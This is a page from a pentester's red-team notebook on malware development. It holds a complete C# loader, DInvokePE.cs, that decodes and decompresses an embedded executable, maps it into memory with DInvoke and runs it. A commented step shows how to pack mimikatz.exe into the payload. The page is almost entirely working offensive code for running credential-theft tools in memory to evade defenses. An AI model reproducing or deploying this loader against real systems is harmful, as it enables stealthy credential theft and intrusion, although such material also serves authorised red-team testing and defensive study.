Pentester's Promiscuous Notebook
BlogGitHubTwitter
Search…
README
⚒️ Pentest
C2
Infrastructure
Misc
OSINT
Password Brute Force
Perimeter
Shells
Web
Wi-Fi
⚔️ Red Team
Basics
Cobalt Strike
Infrastructure
Malware Development
API Hashing
API Hooking
BOF / COFF
Code Injection
D/Invoke
Nim
Sandbox Evasion
Shellcodes
Syscalls
Windows API
SE
⚙️ Admin
Git
Linux
Networking
Virtualization
Windows
Powered By GitBook
D/Invoke
Dynamic API Invocation

Dynamic P/Invoke

Run PE From Memory

DInvokePE.cs
using System;
using System.IO;
using System.IO.Compression;
namespace DInvokePE
{
public class Program
{
static byte[] Compress(byte[] data)
{
MemoryStream output = new MemoryStream();
using (DeflateStream dStream = new DeflateStream(output, CompressionLevel.Optimal))
dStream.Write(data, 0, data.Length);
return output.ToArray();
}
static byte[] Decompress(byte[] data)
{
MemoryStream input = new MemoryStream(data);
MemoryStream output = new MemoryStream();
using (DeflateStream dStream = new DeflateStream(input, CompressionMode.Decompress))
dStream.CopyTo(output);
return output.ToArray();
}
public static void Main(string[] args)
{
/*
var rawBytes = File.ReadAllBytes(@"C:\Users\snovvcrash\Desktop\mimikatz.exe");
var compressed = Compress(rawBytes);
var compressedB64 = Convert.ToBase64String(compressed);
*/
var compressed = Convert.FromBase64String("");
var rawBytes = Decompress(compressed);
DInvoke.Data.PE.PE_MANUAL_MAP map = DInvoke.ManualMap.Map.MapModuleToMemory(rawBytes);
DInvoke.DynamicInvoke.Generic.CallMappedPEModule(map.PEINFO, map.ModuleBase);
Console.ReadLine();
}
}
}
Previous
Shellcode Runners
Next
Nim
Last modified 1mo ago
Copy link
Outline
Dynamic P/Invoke
Run PE From Memory